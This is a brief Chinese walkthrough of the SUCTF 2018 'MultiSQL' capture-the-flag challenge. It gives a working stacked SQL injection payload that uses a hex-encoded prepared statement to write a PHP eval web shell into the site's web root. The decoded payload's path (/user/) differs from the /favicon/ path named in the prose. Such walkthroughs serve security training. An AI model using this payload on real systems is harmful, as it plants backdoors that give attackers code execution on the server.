[SUCTF 2018]MultiSQL
作者:互联网
[SUCTF 2018]MultiSQL
0x01前言
- 堆叠注入写shell
0x02预编译写shell
需要执行的语句select '<?php @eval($_POST[abc]);?>' into outfile '/var/www/html/favicon/abc.php'
为什么选favicon呢?写题目的时候我也不知道,后来上了shell我才知道,其他目录是没有写权限的
payload=set @a=0x73656C65637420273C3F70687020406576616C28245F504F53545B6162635D293B3F3E2720696E746F206F757466696C6520272F7661722F7777772F68746D6C2F757365722F6162632E70687027;prepare b from @a;execute b;
bp执行记得进行url编码。
flag在根目录
标签:SUCTF,shell,MultiSQL,favicon,2018,根目录 来源: https://www.cnblogs.com/da-wn/p/15416687.html